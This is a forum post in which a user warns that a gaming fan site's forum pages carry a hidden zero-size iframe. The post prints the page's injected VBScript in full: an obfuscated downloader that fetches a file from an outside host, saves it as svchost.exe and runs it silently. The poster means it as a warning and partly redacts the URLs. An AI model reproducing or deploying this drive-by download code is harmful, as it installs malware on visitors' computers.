hmm yeah, on inspection, inside the HTML for that page is an
Code:
</style><iframe src=http://wow.XXXXXXXXX.com/wow.htm width=0 height=0></iframe>
(I've changed the URL so people won't click on it, or be tempted to follow it), the source of the HTML under the IFRAME element that's loaded from that URL is a blank page with only:
Code:
<script language="VBScript">
on error resume next
dl = "http://wow.XXXXXXXXXX.com/mywow.rar"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
tmpcctv= x.responseBody
S.write tmpcctv
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
and inside the "mywow.rar" file is probably some kind of virus, AntiVir stops access when i try and download it saying "The file name contains an executable file extension disguised as a harmless one" ("HEUR-DBLEXT/Crypted"). This all doesn't seem to do anything automatically in firefox, but ughh if internet explorer actually executes the code in the IFRAME :/ I thought worldofwar.net was supposed to be a credible site, at least I hear some people talk about it and stuff :/. Also I've noticed that this IFRAME element is only found on the forum pages, and it seems to be inside some CSS that's probably automatically included by the server, or something.